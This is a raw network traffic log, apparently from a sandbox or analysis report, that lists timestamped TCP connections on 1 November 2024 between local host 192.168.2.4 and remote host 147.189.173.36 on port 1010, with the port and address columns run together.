                                            Nov 1, 2024 06:24:26.232398987 CET101050162147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:26.232454062 CET501621010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:26.342395067 CET501631010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:26.348001003 CET101050163147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:26.348083019 CET501631010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:26.375771046 CET501631010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:26.380536079 CET101050163147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:26.380614996 CET501631010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:26.385616064 CET101050163147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:27.034193993 CET101050163147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:27.067354918 CET101050163147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:27.067464113 CET501631010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:27.068140984 CET501631010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:27.073489904 CET101050163147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:27.073654890 CET501631010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:27.207351923 CET501641010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:27.213234901 CET101050164147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:27.213351011 CET501641010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:27.345547915 CET501641010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:27.350656986 CET101050164147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:27.350720882 CET501641010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:27.355618000 CET101050164147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:27.638645887 CET501641010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:27.644169092 CET101050164147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:27.644249916 CET501641010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:27.649185896 CET101050164147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:27.894386053 CET101050164147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:27.928172112 CET101050164147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:27.928221941 CET501641010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:27.929210901 CET501641010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:27.934463978 CET101050164147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:27.934505939 CET501641010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:28.130949974 CET501651010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:28.136058092 CET101050165147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:28.136140108 CET501651010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:28.716005087 CET501651010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:28.721788883 CET101050165147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:28.721862078 CET501651010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:28.726820946 CET101050165147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:28.897629976 CET101050165147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:28.936491966 CET101050165147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:28.938980103 CET501651010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:28.939754009 CET501651010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:28.945018053 CET101050165147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:28.946839094 CET501651010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:29.045542002 CET501661010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:29.050578117 CET101050166147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:29.050735950 CET501661010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:29.061307907 CET501661010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:29.066113949 CET101050166147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:29.066766977 CET501661010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:29.071635962 CET101050166147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:29.724718094 CET101050166147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:29.763524055 CET101050166147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:29.763577938 CET501661010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:29.764202118 CET501661010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:29.777419090 CET101050166147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:29.777573109 CET501661010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:29.873210907 CET501671010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:29.878714085 CET101050167147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:29.878824949 CET501671010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:30.006571054 CET501671010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:30.018969059 CET101050167147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:30.019125938 CET501671010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:30.024779081 CET101050167147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:30.575566053 CET101050167147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:30.609831095 CET101050167147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:30.609940052 CET501671010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:30.610773087 CET501671010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:30.616219997 CET101050167147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:30.616286039 CET501671010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:30.717183113 CET501681010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:30.722220898 CET101050168147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:30.722304106 CET501681010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:30.751166105 CET501681010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:30.756304026 CET101050168147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:30.756357908 CET501681010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:30.761178017 CET101050168147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:31.446357965 CET101050168147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:31.481379986 CET101050168147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:31.481436968 CET501681010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:31.482316017 CET501681010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:31.488454103 CET101050168147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:31.488500118 CET501681010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:31.592206955 CET501691010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:31.597592115 CET101050169147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:31.597726107 CET501691010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:31.715467930 CET501691010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:31.720288038 CET101050169147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:31.720385075 CET501691010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:31.727363110 CET101050169147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:32.288515091 CET101050169147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:32.319358110 CET101050169147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:32.319462061 CET501691010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:32.320152998 CET501691010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:32.325536013 CET101050169147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:32.325726032 CET501691010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:32.435796976 CET501701010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:32.441420078 CET101050170147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:32.443110943 CET501701010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:32.608464956 CET501701010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:32.617619038 CET101050170147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:32.617667913 CET501701010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:32.623349905 CET101050170147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:33.117592096 CET101050170147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:33.151221991 CET101050170147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:33.151297092 CET501701010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:33.152129889 CET501701010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:33.157802105 CET101050170147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:33.157851934 CET501701010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:33.264436007 CET501711010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:33.279723883 CET101050171147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:33.279814959 CET501711010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:33.307370901 CET501711010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:33.312594891 CET101050171147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:33.312643051 CET501711010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:33.317615032 CET101050171147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:33.940529108 CET101050171147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:34.002795935 CET101050171147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:34.002903938 CET501711010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:34.003580093 CET501711010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:34.010185957 CET101050171147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:34.010341883 CET501711010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:34.127707958 CET501721010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:34.132765055 CET101050172147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:34.132883072 CET501721010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:34.254920959 CET501721010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:34.259849072 CET101050172147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:34.262847900 CET501721010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:34.267652988 CET101050172147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:34.812791109 CET101050172147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:34.848439932 CET101050172147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:34.848495007 CET501721010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:34.849178076 CET501721010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:34.855891943 CET101050172147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:34.855942965 CET501721010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:34.967433929 CET501731010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:34.973191023 CET101050173147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:34.973265886 CET501731010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:35.002901077 CET501731010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:35.009637117 CET101050173147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:35.009690046 CET501731010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:35.015335083 CET101050173147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:35.652364969 CET101050173147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:35.689234018 CET101050173147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:35.689320087 CET501731010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:35.692728043 CET501731010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:35.720766068 CET101050173147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:35.720875978 CET501731010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:35.795701027 CET501741010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:35.800719023 CET101050174147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:35.800841093 CET501741010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:35.816781044 CET501741010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:35.822702885 CET101050174147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:35.824858904 CET501741010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:35.830697060 CET101050174147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:36.477180958 CET101050174147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:36.510545015 CET101050174147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:36.510910034 CET501741010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:36.514878035 CET501741010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:36.520699978 CET101050174147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:36.520847082 CET501741010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:36.623913050 CET501751010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:36.628834963 CET101050175147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:36.628911972 CET501751010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:36.674964905 CET501751010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:36.679864883 CET101050175147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:36.679963112 CET501751010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:36.685589075 CET101050175147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:37.303877115 CET101050175147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:37.336772919 CET101050175147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:37.336894035 CET501751010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:37.345689058 CET501751010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:37.350893021 CET101050175147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:37.350964069 CET501751010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:37.510376930 CET501761010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:37.515271902 CET101050176147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:37.515363932 CET501761010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:37.588944912 CET501761010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:37.594908953 CET101050176147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:37.594968081 CET501761010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:37.601072073 CET101050176147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:38.189502954 CET101050176147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:38.222392082 CET101050176147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:38.222459078 CET501761010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:38.223438978 CET501761010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:38.228668928 CET101050176147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:38.228837967 CET501761010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:38.341922045 CET501771010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:38.347404003 CET101050177147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:38.347538948 CET501771010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:38.431271076 CET501771010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:38.436155081 CET101050177147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:38.436219931 CET501771010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:38.441031933 CET101050177147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:39.011661053 CET101050177147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:39.044502974 CET101050177147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:39.044572115 CET501771010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:39.045335054 CET501771010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:39.050607920 CET101050177147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:39.050656080 CET501771010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:39.154536963 CET501781010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:39.159322023 CET101050178147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:39.159403086 CET501781010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:39.182565928 CET501781010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:39.187419891 CET101050178147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:39.187468052 CET501781010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:39.192239046 CET101050178147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:39.846394062 CET101050178147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:39.879673958 CET101050178147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:39.886873007 CET501781010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:39.984622002 CET501781010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:39.989902020 CET101050178147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:39.991906881 CET501781010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:40.154652119 CET501791010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:40.159624100 CET101050179147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:40.159794092 CET501791010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:40.431266069 CET501791010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:40.436110973 CET101050179147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:40.436182976 CET501791010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:40.440937042 CET101050179147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:40.837879896 CET101050179147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:40.870691061 CET101050179147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:40.870902061 CET501791010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:40.871483088 CET501791010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:40.876683950 CET101050179147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:40.876766920 CET501791010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:40.993160009 CET501801010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:41.135694981 CET101050180147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:41.135987043 CET501801010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:41.207945108 CET501801010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:41.212910891 CET101050180147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:41.212965965 CET501801010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:41.217783928 CET101050180147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:41.685743093 CET501801010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:41.690876007 CET101050180147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:41.691061020 CET501801010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:41.695795059 CET101050180147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:41.820843935 CET101050180147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:41.842931032 CET101050180147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:41.847328901 CET501801010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:41.851115942 CET501801010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:41.856452942 CET101050180147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:41.856579065 CET501801010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:41.971630096 CET501811010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:41.976608038 CET101050181147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:41.979403019 CET501811010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:42.067290068 CET501811010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:42.072216034 CET101050181147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:42.075021029 CET501811010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:42.079794884 CET101050181147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:42.668534040 CET101050181147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:42.702429056 CET101050181147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:42.702542067 CET501811010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:42.707461119 CET501811010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:42.712908983 CET101050181147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:42.713027954 CET501811010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:42.933351994 CET501821010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:42.938395977 CET101050182147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:42.938476086 CET501821010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:43.338251114 CET501821010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:43.343050957 CET101050182147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:43.343152046 CET501821010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:43.347929001 CET101050182147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:43.645684004 CET101050182147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:43.678623915 CET101050182147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:43.678747892 CET501821010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:43.679524899 CET501821010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:43.686089039 CET101050182147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:43.686789989 CET501821010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:43.795167923 CET501831010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:43.800029993 CET101050183147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:43.800163984 CET501831010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:43.921585083 CET501831010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:43.926352978 CET101050183147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:43.926609993 CET501831010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:43.931385994 CET101050183147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:44.062748909 CET501831010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:44.070202112 CET101050183147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:44.070261002 CET501831010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:44.075050116 CET101050183147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:44.481009960 CET101050183147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:44.514072895 CET101050183147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:44.514183044 CET501831010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:44.518784046 CET501831010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:44.524290085 CET101050183147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:44.524389029 CET501831010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:44.623449087 CET501841010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:44.628281116 CET101050184147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:44.628348112 CET501841010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:44.668401003 CET501841010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:44.673582077 CET101050184147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:44.673640013 CET501841010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:44.678584099 CET101050184147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:45.306112051 CET101050184147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:45.339097977 CET101050184147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:45.339274883 CET501841010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:45.339787006 CET501841010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:45.345233917 CET101050184147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:45.345298052 CET501841010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:45.452338934 CET501851010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:45.457351923 CET101050185147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:45.457573891 CET501851010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:45.485532999 CET501851010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:45.490336895 CET101050185147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:45.490427971 CET501851010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:45.495248079 CET101050185147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:46.134109974 CET101050185147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:46.166991949 CET101050185147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:46.167179108 CET501851010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:46.167855978 CET501851010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:46.173135042 CET101050185147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:46.173224926 CET501851010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:46.280150890 CET501861010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:46.284986019 CET101050186147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:46.285540104 CET501861010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:46.358561039 CET501861010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:46.363341093 CET101050186147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:46.363624096 CET501861010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:46.368415117 CET101050186147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:46.946599960 CET101050186147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:46.980586052 CET101050186147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:46.980665922 CET501861010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:46.981300116 CET501861010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:46.987657070 CET101050186147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:46.987725019 CET501861010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:47.093496084 CET501871010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:47.098498106 CET101050187147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:47.098658085 CET501871010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:47.127610922 CET501871010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:47.132775068 CET101050187147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:47.132853031 CET501871010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:47.137687922 CET101050187147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:47.777102947 CET101050187147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:47.809962988 CET101050187147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:47.810497046 CET501871010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:47.810924053 CET501871010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:47.817270994 CET101050187147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:47.817394972 CET501871010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:47.921909094 CET501881010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:47.926703930 CET101050188147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:47.926963091 CET501881010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:48.056783915 CET501881010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:48.062757015 CET101050188147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:48.062985897 CET501881010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:24:48.069042921 CET101050188147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:48.619718075 CET101050188147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:24:48.647963047 CET101050188147.189.173.36192.168.2.4
